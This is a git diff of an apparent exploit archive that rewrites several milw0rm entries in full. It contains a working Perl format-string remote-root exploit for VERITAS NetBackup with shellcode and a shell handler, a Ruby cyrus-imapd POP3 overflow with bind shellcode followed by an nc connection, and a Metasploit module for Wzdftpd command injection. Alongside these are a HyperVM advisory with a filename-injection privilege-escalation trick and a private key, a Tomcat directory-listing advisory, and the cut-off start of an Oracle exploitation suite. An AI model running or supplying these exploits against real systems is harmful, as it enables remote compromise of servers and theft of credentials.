interface, you win. - -Mitigation: -After the VM is restarted, manually delete these files as the root user before anyone else reads them. - -Regards, -Xia Shing Zee - -# milw0rm.com [2009-08-25] +HyperVM is a virtualization application that runs off a host node and can provide +several Virtual Private Servers. There is a previously unreported vulnerability in +HyperVM/Kloxo. + +It was originally documented in ISSUE 14 by an anonymous author: +http://www.milw0rm.com/exploits/8880 + +It turns out that he was showing how a root shell can be created: + + [user1@testing574 tmp]$ ls -al + total 28 + drwxrwxrwt 4 root root 4096 May 21 08:41 . + drwxr-xr-x 24 root root 4096 May 19 16:57 .. + -rw-rw-r-- 1 user1 user1 0 May 21 08:40 ;cd ..;chown root.root shell;chmod 4755 shell; + drwx------ 2 root root 4096 May 21 08:41 backupPdUzR4 + -rwsr-xr-x 1 root root 5056 May 21 08:41 shell + -rw-rw-r-- 1 user1 user1 89 May 21 08:33 shell.c + +This is pointless, because after a 'restore from backup' in HyperVM, it creates that folder +"backupPdUzR4" + +Let's take a look at it...On a VM I tested, even the directory was readable. +$ ls -lha /tmp/backupfileIy00MO/ +total 36K +drwxr-xr-x 2 root root 4.0K Dec 12 02:18 . +drwxr-xr-x 3 root root 4.0K Dec 12 10:37 .. +-rw-r--r-- 1 root root 15K Dec 12 00:46 hypervm.file +-rw-r--r-- 1 root root 11K Dec 12 00:46 hypervm.metadata + +World readable files. In it, root passwords in plain text. Including username, RSA private keys and lots more. + +Here the VM type is shown, it appears to be OpenVZ: +$ cat hypervm.file +al_list";a:0:{}s:13:"__object_list";N;s:9:"subaction";N;s:8:"dbaction";s:5:"clean";s:12:"metadbaction";s:3:"all";s:7:"__class";s:11:"vps__op +envz"; + +--snip-- +Private keys! +"hostname";s:8:"fakevps";s:12:"use +rname";s:10:"fakeusername";s:16:"text_private_key";s:887:"-----BEGIN RSA PRIVATE KEY----- +FIICXZIBAAKBgQDdehG9ScmFWL3AZHeXqm2oljMRbyic7dlfGv9E3tMyWgWCSnF9 +dJ/gI+NoY1ygic52NJEAB1/blDtZMDnx3ze4wf79p9rGzAuT5N+yKqleMdlwozQC +Lf17blSAQAXPi84Sy95huIMR9vZ/fPDOi7ucHWSk8aaqVI5JY8QpSewoVQIDAQAB +AoGBAKVT7E4a+L38AmoHlWa4KGfCx5hqHC0ZODzQkGG+3HUn0hjyrUlzd6z/3VAd +bBXDCUYf82XMY3h0bOElKPwvHw3+sgUyceSBONLa9pi+He/6ljwR0/LG6XjctdLH +RwVNTEXY/JS15VRKyyXMdohhVbIXa3NjbMqvIBEJPmnjVlWBAkEA90xPi9te3HYj +54uH7/+cEuZ9TlLyeB9+MQ0t7MfqNY1v2PRK+h4J6y4N+v43o9kkN7RGR3zd5Bww +qP/TEfBL8QJBAOVFKGMwkY/2dhqKjnHC2rkN8B5Hn8Px2quf7SXn2tgnuZRYOxah +WAtzdZSt64Vsaz+3fh6tIZ6YYQo/BYJMlqUCQD/UpIWPmZrCqJgVLn/n9kvu0xSh +V1ZpkvNo2p1RMwamP+S7lIujq53aYuOUM5sKGM6ErMwR0VrtaCaI/N2ZspECQBZn +P58Rq+epabkGOQ0cwUq79e6/iPkYtQl4QzAlC9kRF61LQdrgQT49NgwlQpJzGbfM +TmLFADgDI9hgeCVXXpECQQC0c5owQrCx38xtZp6dydAccnHo4jrC83lRL6Epxueo +i+3UYzuVxCQkBdhoF/5nsXv5Qh914MHGnH12qepPokyjd +-----END RSA PRIVATE KEY----- +";s:15:"text_public_key";s:1188:"-----BEGIN CERTIFICATE----- +BIIDfPzCCAqigAwIBAgIBADANBgkqhkiG9w0BAQUFADB5MRMwEQYDNQDEwpseGxh +YnMuY29tMQswCQYDVQQGEwJJTjELMAkGA1UECBMCaW4xCzAJBgNVBAcTAmluMQsw +CQYDVQQKEwJseDENMAsGA1UECxMEc29mdDEfMB0GCSqGSIb3DQEJAUYQYWRtaW5A +bHhsYWJzLmNvbTAeFw0wOTA2MTExMzAyNDdaFw0xMDA2MTExMzAyNDdaMHkxEzAR +BgNVBAMTCmx4bGFicy9jb20xCzAJBgNVBAYTAklOMQswCQYDVQQIEwJpbjELMAkG +Z2UEBxMCaW4xCzAJBgNVBAoTAmx4MQ0wCwYDVQQLEwRzb3Z0MR8wHQYJKoZIhvcN +AQkBFhBhZG1pbkBseGxhYnMuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB +gQDdehG9ScmFWL2AZHeXqm2oljMRbyic7dlfGv9E3tMyWgWCSnF9dJ/gI+NoY1yg +ic52NJEAB1/blDtZMDnx3ze4wf79p9rGzAuT5N+yKqleMdlwozQCLf17blSAQAXP +i94Sy95huIMR9vZ/fPDOi7ucHWSk8aaqVI5JY7QpSewoVQIDAQABo4KWMIHTMB0G +A1UdDgQWBBRMXffyd+fJWt/iYe1jteuLL8UukzCBowYDVR0jBIGbMIGYgBRMXffy +d+fJWt/iYe1jteuLL8Uuk6F9pHsweTETMBEGA1UEAxMKbHhsYWJzLmNvbTELMAkG +A1UEBhMCSU4xCzAJBgNVBAgTAmluMQswCQYDVQQHEwJpbjELMAkGA1UEChMCbHgx +DTALBgNVBAsTBHNvZnQxHzAdBgkqhkiG9w0BCQEWEGFkbWluQGx4bGIicy5jb22C +AQAwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOBgQCQnz/9DIzn5CVItRwk +HHMZBLlq3MtmQYmwGuNjiss3UkYC1ehi9LDLfQ4AzJfjUrvBpuksozdfvYlpXnA1 +LAmOniBgyZW0aUStSrSr4czva4d3VMyOqQ/Dgr//i+RSuo4QH+6wI0G/oirE+E6b +uR24why0WWPNsyJU3adesPo4eQf== +-----END CERTIFICATE----- + +--snip-- +Root passwords! +sable_reason";s:0:"";s:11:"createstage";s:0:"";s:13:"createmessage";s:0:"";s:12:"rootpassword";s:21:"xxxxxxxxxxxxxxxxxxxx";s:20:"rootpassword_changed";s + +So in summary, here are the exploitation steps: +1. Log into HyperVM/Kloxo +2. Click "Backup Home" +3. In the field labeled "Restore from file", browse for any restore file from the popup box. +4. Wait till the VM has finished restoring from backup. +5. Login. If the root user hasn't deleted these files from /tmp/backupXXXXX before bringing up the network interface, you win. + +Mitigation: +After the VM is restarted, manually delete these files as the root user before anyone else reads them. + +Regards, +Xia Shing Zee + +# milw0rm.com [2009-08-25] diff --git a/platforms/multiple/remote/1007.html b/platforms/multiple/remote/1007.html index af961a3ce..db59ead13 100755 --- a/platforms/multiple/remote/1007.html +++ b/platforms/multiple/remote/1007.html @@ -39,7 +39,7 @@ document.getElementById('linkhtml_"+os+"').value",300); +</textarea> +</textarea> +</textarea> +</textarea>

Run exploit - - -# milw0rm.com [2005-05-21] + + +# milw0rm.com [2005-05-21] diff --git a/platforms/multiple/remote/1188.c b/platforms/multiple/remote/1188.c index ba32ef65e..f2923ba10 100755 --- a/platforms/multiple/remote/1188.c +++ b/platforms/multiple/remote/1188.c @@ -142,6 +142,6 @@ int main(int argc, char *argv[]) LocalFree(buf); LocalFree(evil); return 0; -} - -// milw0rm.com [2005-08-30] +} + +// milw0rm.com [2005-08-30] diff --git a/platforms/multiple/remote/1263.pl b/platforms/multiple/remote/1263.pl index 6a856885e..11300f3f9 100755 --- a/platforms/multiple/remote/1263.pl +++ b/platforms/multiple/remote/1263.pl @@ -1,153 +1,153 @@ -#!/usr/bin/perl -############################################################## -# VERITAS-Linux.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit -# johnh[at]digitalmunition[dot]com -# bug found by kf_lists[at]digitalmunition[dot]com -# http://www.digitalmunition.com/ -############################################################## - -use POSIX; -use IO::Socket; -use IO::Select; -use strict; - -print STDERR "\nveritas.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit\n"; - -if ($#ARGV == -1) { - print "Usage:\n\t$0 \n\n"; - exit (1); -} - -my $hostName = $ARGV[0]; -my $port = $ARGV[1] || 13722; - -buildexploit ($hostName, $port); - -my $shellport = 5570; -print "[*] Connect to remote shell port\n"; -my $sock = IO::Socket::INET->new ( - Proto => "tcp", - PeerAddr => $hostName, - PeerPort => $shellport, - Type => SOCK_STREAM -); - -if (! $sock) -{ - print "[*] Error, Seems Failed\n"; - exit (0); -} - -print "[*] G0t R00T\n"; - -StartShell ($sock); - -sub buildexploit -{ - my ($host, $port) = @_; - my $s = IO::Socket::INET->new ( - Proto => "tcp", - PeerAddr => $host, - PeerPort => $port, - Type => SOCK_STREAM - ); - - if (! $s) - { - print "[*] Could not create socket: $!\n"; - exit(0); - } - - print $s " 118 1\nOWNED BABY\n"; - print scalar <$s>; - print scalar <$s>; - - my $shellcode = "\x90" x 500 . - "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x16\x81\x73\x17\x13\x99". - "\x37\xe2\x83\xeb\xfc\xe2\xf4\x22\x42\xc0\x01\xa3\xff\x64\xa1\x40". - "\xda\x64\x6b\xf2\xd2\xfa\x62\x9a\x5e\x65\x84\x7b\x8c\xf5\xa1\x75". - "\xca\xbe\x03\xa3\x89\x67\xb3\x44\x10\xd6\x52\x75\x54\xb7\x52\x75". - "\x2a\x33\x2f\x93\xc9\x67\xb5\x9a\x78\x74\x52\x75\x54\xb7\x6b\xca". - "\x10\xf4\x52\x2c\xd0\xfa\x62\x52\x7b\xcf\xb3\x7b\xf7\x18\x91\x7b". - "\xf1\x18\xcd\x71\xf0\xbe\x01\x42\xca\xbe\x03\xa3\x92\xfa\x62"; - my $retloc = 0x080b50ec; #0x080b53b4; - my $retaddr = 0x80e0658; # can't use shellcode in stack. - my $hi = ($retaddr >> 0) & 0xffff; - my $lo = ($retaddr >> 16) & 0xffff; - - - $hi = $hi - 0x28; - $lo = (0x10000 + $lo + 0x28) - $hi - 0x50; - - my $align = 3; - my $buffer = " 101 6\n" . "a" x $align . pack ('l', $retloc) . pack ('l', $retloc + 2) . - "%." . $hi . "lx" . "%1694\$hn" . - "%." . $lo . "lx" . "%1695\$hn" . - $shellcode . "\n" . - $shellcode . "\n" . - "i\n" . "0wned\n" . "y0u\n". - "boot.ini\n" . "\n"; - - print STDERR "Sending " .length($buffer) . " bytes to remote\n"; - sleep (10); - print $s $buffer; - print scalar <$s>; - - close $s; -} - -sub StartShell -{ - my ($client) = @_; - my $sel = IO::Select->new(); - - - # unbuffered fun. - - - Unblock(*STDIN); - Unblock(*STDOUT); - Unblock($client); - - select($client); $|++; - select(STDIN); $|++; - select(STDOUT); $|++; - - $sel->add($client); - $sel->add(*STDIN); - - while (fileno($client)) - { - my $fd; - my @fds = $sel->can_read(1); - - foreach $fd (@fds) - { - my $in = <$fd>; - if (! $in || ! $fd || ! $client) - { - print "[*] Closing connection.\n"; - close($client); - exit(0); - } - - if ($fd eq $client) - { - print STDOUT $in; - } else { - print $client $in; - } - } - } - close ($client); - exit (0); -} - -sub Unblock { - my $fd = shift; - my $flags; - $flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n"; - fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n"; -} - -# milw0rm.com [2005-10-20] +#!/usr/bin/perl +############################################################## +# VERITAS-Linux.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit +# johnh[at]digitalmunition[dot]com +# bug found by kf_lists[at]digitalmunition[dot]com +# http://www.digitalmunition.com/ +############################################################## + +use POSIX; +use IO::Socket; +use IO::Select; +use strict; + +print STDERR "\nveritas.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit\n"; + +if ($#ARGV == -1) { + print "Usage:\n\t$0 \n\n"; + exit (1); +} + +my $hostName = $ARGV[0]; +my $port = $ARGV[1] || 13722; + +buildexploit ($hostName, $port); + +my $shellport = 5570; +print "[*] Connect to remote shell port\n"; +my $sock = IO::Socket::INET->new ( + Proto => "tcp", + PeerAddr => $hostName, + PeerPort => $shellport, + Type => SOCK_STREAM +); + +if (! $sock) +{ + print "[*] Error, Seems Failed\n"; + exit (0); +} + +print "[*] G0t R00T\n"; + +StartShell ($sock); + +sub buildexploit +{ + my ($host, $port) = @_; + my $s = IO::Socket::INET->new ( + Proto => "tcp", + PeerAddr => $host, + PeerPort => $port, + Type => SOCK_STREAM + ); + + if (! $s) + { + print "[*] Could not create socket: $!\n"; + exit(0); + } + + print $s " 118 1\nOWNED BABY\n"; + print scalar <$s>; + print scalar <$s>; + + my $shellcode = "\x90" x 500 . + "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x16\x81\x73\x17\x13\x99". + "\x37\xe2\x83\xeb\xfc\xe2\xf4\x22\x42\xc0\x01\xa3\xff\x64\xa1\x40". + "\xda\x64\x6b\xf2\xd2\xfa\x62\x9a\x5e\x65\x84\x7b\x8c\xf5\xa1\x75". + "\xca\xbe\x03\xa3\x89\x67\xb3\x44\x10\xd6\x52\x75\x54\xb7\x52\x75". + "\x2a\x33\x2f\x93\xc9\x67\xb5\x9a\x78\x74\x52\x75\x54\xb7\x6b\xca". + "\x10\xf4\x52\x2c\xd0\xfa\x62\x52\x7b\xcf\xb3\x7b\xf7\x18\x91\x7b". + "\xf1\x18\xcd\x71\xf0\xbe\x01\x42\xca\xbe\x03\xa3\x92\xfa\x62"; + my $retloc = 0x080b50ec; #0x080b53b4; + my $retaddr = 0x80e0658; # can't use shellcode in stack. + my $hi = ($retaddr >> 0) & 0xffff; + my $lo = ($retaddr >> 16) & 0xffff; + + + $hi = $hi - 0x28; + $lo = (0x10000 + $lo + 0x28) - $hi - 0x50; + + my $align = 3; + my $buffer = " 101 6\n" . "a" x $align . pack ('l', $retloc) . pack ('l', $retloc + 2) . + "%." . $hi . "lx" . "%1694\$hn" . + "%." . $lo . "lx" . "%1695\$hn" . + $shellcode . "\n" . + $shellcode . "\n" . + "i\n" . "0wned\n" . "y0u\n". + "boot.ini\n" . "\n"; + + print STDERR "Sending " .length($buffer) . " bytes to remote\n"; + sleep (10); + print $s $buffer; + print scalar <$s>; + + close $s; +} + +sub StartShell +{ + my ($client) = @_; + my $sel = IO::Select->new(); + + + # unbuffered fun. + + + Unblock(*STDIN); + Unblock(*STDOUT); + Unblock($client); + + select($client); $|++; + select(STDIN); $|++; + select(STDOUT); $|++; + + $sel->add($client); + $sel->add(*STDIN); + + while (fileno($client)) + { + my $fd; + my @fds = $sel->can_read(1); + + foreach $fd (@fds) + { + my $in = <$fd>; + if (! $in || ! $fd || ! $client) + { + print "[*] Closing connection.\n"; + close($client); + exit(0); + } + + if ($fd eq $client) + { + print STDOUT $in; + } else { + print $client $in; + } + } + } + close ($client); + exit (0); +} + +sub Unblock { + my $fd = shift; + my $flags; + $flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n"; + fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n"; +} + +# milw0rm.com [2005-10-20] diff --git a/platforms/multiple/remote/1292.pm b/platforms/multiple/remote/1292.pm index af4d99739..ca900a8de 100755 --- a/platforms/multiple/remote/1292.pm +++ b/platforms/multiple/remote/1292.pm @@ -1,148 +1,148 @@ -# Reference: http://www.milw0rm.com/id.php?id=1231 (kcope) /str0ke - -# -# Metasploit plugin for: Wzdftpd SITE Command Arbitrary Command Execution -# 2005 11 26 - David Maciejak -# - -package Msf::Exploit::wzdftpd_site; -use base "Msf::Exploit"; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = { - 'Name' => 'Wzdftpd SITE Command Arbitrary Command Execution', - 'Version' => '$Revision: 1.0 $', - 'Authors' => [ 'David Maciejak ' ], - 'Arch' => [ ], - 'OS' => [ ], - 'Priv' => 1, - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 21], - 'USER' => [1, 'DATA', 'Username', 'guest'], - 'PASS' => [1, 'DATA', 'Password', '%'], - 'SITECMD'=> [1, 'DATA', 'Custom site command'], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This module exploits an arbitrary command execution vulnerability in Wzdftpd - threw SITE command. Wzdftpd version to 0.5.4 are vulnerable. -}), - 'Refs' => - [ - ['BID', '14935'], - ], - - 'Payload' => - { - 'Space' => 128, - 'Keys' => ['cmd','cmd_bash'], - }, - - 'Keys' => ['wzdftpd_site'], - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Check { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - ); - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return $self->CheckCode('Connect'); - } - my $res = $s->Recv(-1, 5); - $s->Close(); - - if (! $res) { - $self->PrintLine("[*] No FTP banner"); - return $self->CheckCode('Unknown'); - } - - if ($res =~ /220 wzd server ready/) - { - $self->PrintLine("[*] FTP Server is a wzdftpd server"); - return $self->CheckCode('Appears'); - } - else - { - $self->PrintLine("[*] FTP Server is probably not vulnerable"); - return $self->CheckCode('Safe'); - } -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $custom_site_cmd=$self->GetVar('SITECMD'); - my $encodedPayload = $self->GetVar('EncodedPayload'); - my $cmd = $encodedPayload->RawPayload; - my $user = $self->GetVar('USER'); - my $pass = $self->GetVar('PASS'); - - my $s = Msf::Socket::Tcp->new( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - ); - - if ($s->IsError){ - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - $self->PrintLine("[*] Establishing a connection to the FTP server ..."); - - $s->Send("USER ".$user); - - my $result = $s->Recv(-1, 20); - if (!($result=~/\d{3} User .+ okay, need password/)) - { - $self->PrintLine("[*] Invalid user"); - return; - } - - $s->Send("PASS ".$pass); - $result = $s->Recv(-1, 20); - - if (!($result=~/\d{3} User logged in/)) - { - $self->PrintLine("[*] Invalid password"); - return; - } - - $s->Send("SITE ".$custom_site_cmd." | $cmd;"); - $result = $s->Recv(-1, 20); - if (!($result=~/^200/)) - { - $self->PrintLine("[*] Error: $result"); - return; - } - - $self->PrintLine(''); - my @results = split ( /\n/, $result ); - chomp @results; - for (my $i = 1; $i < @results -1; $i++){ - $self->PrintLine("$results[$i]"); - } - return; -} - -1; - -# milw0rm.com [2005-11-04] +# Reference: http://www.milw0rm.com/id.php?id=1231 (kcope) /str0ke + +# +# Metasploit plugin for: Wzdftpd SITE Command Arbitrary Command Execution +# 2005 11 26 - David Maciejak +# + +package Msf::Exploit::wzdftpd_site; +use base "Msf::Exploit"; +use strict; +use Pex::Text; + +my $advanced = { }; + +my $info = { + 'Name' => 'Wzdftpd SITE Command Arbitrary Command Execution', + 'Version' => '$Revision: 1.0 $', + 'Authors' => [ 'David Maciejak ' ], + 'Arch' => [ ], + 'OS' => [ ], + 'Priv' => 1, + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 21], + 'USER' => [1, 'DATA', 'Username', 'guest'], + 'PASS' => [1, 'DATA', 'Password', '%'], + 'SITECMD'=> [1, 'DATA', 'Custom site command'], + }, + + 'Description' => Pex::Text::Freeform(qq{ + This module exploits an arbitrary command execution vulnerability in Wzdftpd + threw SITE command. Wzdftpd version to 0.5.4 are vulnerable. +}), + 'Refs' => + [ + ['BID', '14935'], + ], + + 'Payload' => + { + 'Space' => 128, + 'Keys' => ['cmd','cmd_bash'], + }, + + 'Keys' => ['wzdftpd_site'], + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Check { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + ); + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return $self->CheckCode('Connect'); + } + my $res = $s->Recv(-1, 5); + $s->Close(); + + if (! $res) { + $self->PrintLine("[*] No FTP banner"); + return $self->CheckCode('Unknown'); + } + + if ($res =~ /220 wzd server ready/) + { + $self->PrintLine("[*] FTP Server is a wzdftpd server"); + return $self->CheckCode('Appears'); + } + else + { + $self->PrintLine("[*] FTP Server is probably not vulnerable"); + return $self->CheckCode('Safe'); + } +} + +sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $custom_site_cmd=$self->GetVar('SITECMD'); + my $encodedPayload = $self->GetVar('EncodedPayload'); + my $cmd = $encodedPayload->RawPayload; + my $user = $self->GetVar('USER'); + my $pass = $self->GetVar('PASS'); + + my $s = Msf::Socket::Tcp->new( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + ); + + if ($s->IsError){ + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + + $self->PrintLine("[*] Establishing a connection to the FTP server ..."); + + $s->Send("USER ".$user); + + my $result = $s->Recv(-1, 20); + if (!($result=~/\d{3} User .+ okay, need password/)) + { + $self->PrintLine("[*] Invalid user"); + return; + } + + $s->Send("PASS ".$pass); + $result = $s->Recv(-1, 20); + + if (!($result=~/\d{3} User logged in/)) + { + $self->PrintLine("[*] Invalid password"); + return; + } + + $s->Send("SITE ".$custom_site_cmd." | $cmd;"); + $result = $s->Recv(-1, 20); + if (!($result=~/^200/)) + { + $self->PrintLine("[*] Error: $result"); + return; + } + + $self->PrintLine(''); + my @results = split ( /\n/, $result ); + chomp @results; + for (my $i = 1; $i < @results -1; $i++){ + $self->PrintLine("$results[$i]"); + } + return; +} + +1; + +# milw0rm.com [2005-11-04] diff --git a/platforms/multiple/remote/201.c b/platforms/multiple/remote/201.c index 1ecfd1714..953ea8b1b 100755 --- a/platforms/multiple/remote/201.c +++ b/platforms/multiple/remote/201.c @@ -540,6 +540,6 @@ char **argv; exit(0); } - - -// milw0rm.com [2000-11-21] + + +// milw0rm.com [2000-11-21] diff --git a/platforms/multiple/remote/2053.rb b/platforms/multiple/remote/2053.rb index 0c83b3697..235d810cb 100755 --- a/platforms/multiple/remote/2053.rb +++ b/platforms/multiple/remote/2053.rb @@ -1,87 +1,87 @@ -#!/usr/bin/ruby -# -# cyrus-imapd pop3d exploit -# by bannedit -# -# 05/23/2006 -# This exploit takes advantage of a stack based overflow. -# Once the stack corruption has occured it is possible -# to overwrite a pointer which is later used for a memcpy -# this gives us a write anything anywhere condition similar -# to a format string vulnerability. -# -# I choose to overwrite the GOT table with my shellcode and -# return to it. This defeats the VA random patch and possibly -# other stack protection features. -# -# tested on gentoo-sources linux 2.6.16 - - - -require 'socket' - -#will add targets for other linux distros -targets = { 'linux 2.6' => '0x080fd318', 'linux 2.6 Hardened' => '', 'freebsd' => '' } - - -#metasploit bind shellcode by skape 84 bytes port 4444# - -shellcode = -"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"+ -"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"+ -"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"+ -"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"+ -"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"+ -"\x89\xe1\xcd\x80" - - -puts "--[cyrus imapd pop3 popsubfolders exploit" -puts "----[by bannedit" -puts "-----------------------------------------" - -case ARGV.length - -when 0 - puts "--- ./exploit [host] [options]" - exit - -when 1 - sock = TCPSocket.new(ARGV[0], "pop3") - -when 2 - sock = TCPSocket.new(ARGV[0], "pop3") - ret = ARGV[1].hex - -end - -ret = (targets['linux 2.6'].hex) - -puts "<- " + banner = sock.gets -puts "-> sending USER command" -printf " injecting shellcode: %d bytes\n", shellcode.length - - -#this alignment stuff should probably be cleaned up its kinda icky# - -evil_buff = "USER " -evil_buff <<"\x90" * 265 #(290 - shellcode.length) - -evil_buff << ([ret].pack('V')) * 2 #return address -evil_buff <<"\x90" * (250 - shellcode.length) -evil_buff << shellcode -evil_buff <<"\x90" * (29) -ret = ret - 277 -evil_buff << ([ret].pack('V')) * 4 #0x080fd204 -evil_buff <<"\r\n" - -sock.send(evil_buff, 0) - -sleep 9 -puts " attempting to connect to #{ARGV[0]} port 4444" - -cmd = "nc #{ARGV[0]} 4444" -system(cmd) - -sock.close - -# milw0rm.com [2006-07-21] +#!/usr/bin/ruby +# +# cyrus-imapd pop3d exploit +# by bannedit +# +# 05/23/2006 +# This exploit takes advantage of a stack based overflow. +# Once the stack corruption has occured it is possible +# to overwrite a pointer which is later used for a memcpy +# this gives us a write anything anywhere condition similar +# to a format string vulnerability. +# +# I choose to overwrite the GOT table with my shellcode and +# return to it. This defeats the VA random patch and possibly +# other stack protection features. +# +# tested on gentoo-sources linux 2.6.16 + + + +require 'socket' + +#will add targets for other linux distros +targets = { 'linux 2.6' => '0x080fd318', 'linux 2.6 Hardened' => '', 'freebsd' => '' } + + +#metasploit bind shellcode by skape 84 bytes port 4444# + +shellcode = +"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"+ +"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"+ +"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"+ +"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"+ +"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"+ +"\x89\xe1\xcd\x80" + + +puts "--[cyrus imapd pop3 popsubfolders exploit" +puts "----[by bannedit" +puts "-----------------------------------------" + +case ARGV.length + +when 0 + puts "--- ./exploit [host] [options]" + exit + +when 1 + sock = TCPSocket.new(ARGV[0], "pop3") + +when 2 + sock = TCPSocket.new(ARGV[0], "pop3") + ret = ARGV[1].hex + +end + +ret = (targets['linux 2.6'].hex) + +puts "<- " + banner = sock.gets +puts "-> sending USER command" +printf " injecting shellcode: %d bytes\n", shellcode.length + + +#this alignment stuff should probably be cleaned up its kinda icky# + +evil_buff = "USER " +evil_buff <<"\x90" * 265 #(290 - shellcode.length) + +evil_buff << ([ret].pack('V')) * 2 #return address +evil_buff <<"\x90" * (250 - shellcode.length) +evil_buff << shellcode +evil_buff <<"\x90" * (29) +ret = ret - 277 +evil_buff << ([ret].pack('V')) * 4 #0x080fd204 +evil_buff <<"\r\n" + +sock.send(evil_buff, 0) + +sleep 9 +puts " attempting to connect to #{ARGV[0]} port 4444" + +cmd = "nc #{ARGV[0]} 4444" +system(cmd) + +sock.close + +# milw0rm.com [2006-07-21] diff --git a/platforms/multiple/remote/2061.txt b/platforms/multiple/remote/2061.txt index 8341d218c..7d446eb0a 100755 --- a/platforms/multiple/remote/2061.txt +++ b/platforms/multiple/remote/2061.txt @@ -1,23 +1,23 @@ -ScanAlert Security Advisory - http://www.scanalert.com - -Directory Listing in Apache Tomcat 5.x.x - -Date: 07/21/2006 -Vendor: Apache -Package: Tomcat -Versions: 5.x.x (5.0.28, 5.5.12, 5.5.9, and 5.5.7 . Confirmed) -Credit: ScanAlert.s Enterprise Services Team. - -Overview: -Apache Tomcat is the servlet container that is used in the official Reference Implementation -for the Java Servlet and JavaServer Pages technologies. - -Vulnerabilities: -Apache Tomcat can be forced to reveal a complete directory listing for any directory by requesting -a mapped file extension prepended with a semicolon, a reserved character. The file does not need to exist. - -Examples: -http://www.sitexyz.com/;index.jsp -http://www.sitexyz.com/help/;help.do - -# milw0rm.com [2006-07-23] +ScanAlert Security Advisory - http://www.scanalert.com + +Directory Listing in Apache Tomcat 5.x.x + +Date: 07/21/2006 +Vendor: Apache +Package: Tomcat +Versions: 5.x.x (5.0.28, 5.5.12, 5.5.9, and 5.5.7 . Confirmed) +Credit: ScanAlert.s Enterprise Services Team. + +Overview: +Apache Tomcat is the servlet container that is used in the official Reference Implementation +for the Java Servlet and JavaServer Pages technologies. + +Vulnerabilities: +Apache Tomcat can be forced to reveal a complete directory listing for any directory by requesting +a mapped file extension prepended with a semicolon, a reserved character. The file does not need to exist. + +Examples: +http://www.sitexyz.com/;index.jsp +http://www.sitexyz.com/help/;help.do + +# milw0rm.com [2006-07-23] diff --git a/platforms/multiple/remote/2784.html b/platforms/multiple/remote/2784.html index 9a4c2f7e4..d48943b9e 100755 --- a/platforms/multiple/remote/2784.html +++ b/platforms/multiple/remote/2784.html @@ -1,54 +1,54 @@ - - -Put /etc/passwd -Get .bashrc - - -# milw0rm.com [2006-11-14] + + +Put /etc/passwd +Get .bashrc + + +# milw0rm.com [2006-11-14] diff --git a/platforms/multiple/remote/2837.sql b/platforms/multiple/remote/2837.sql index f73003f1e..af496dd9b 100755 --- a/platforms/multiple/remote/2837.sql +++ b/platforms/multiple/remote/2837.sql @@ -1,100 +1,100 @@ --- --- $Id: raptor_oraexec.sql,v 1.2 2006/11/23 23:40:16 raptor Exp $ --- --- raptor_oraexec.sql - java exploitation suite for oracle --- Copyright (c) 2006 Marco Ivaldi --- --- This is an exploitation suite for Oracle written in Java. Use it to --- read/write files and execute OS commands with the privileges of the --- RDBMS, if you have the required permissions (DBA role and SYS:java). --- --- "The Oracle RDBMS could almost be considered as a shell like bash or the --- Windows Command Prompt; it's not only capable of storing data but can also --- be used to completely access the file system and run operating system --- commands" -- David Litchfield (http://www.databasesecurity.com/) --- --- Usage example: --- $ 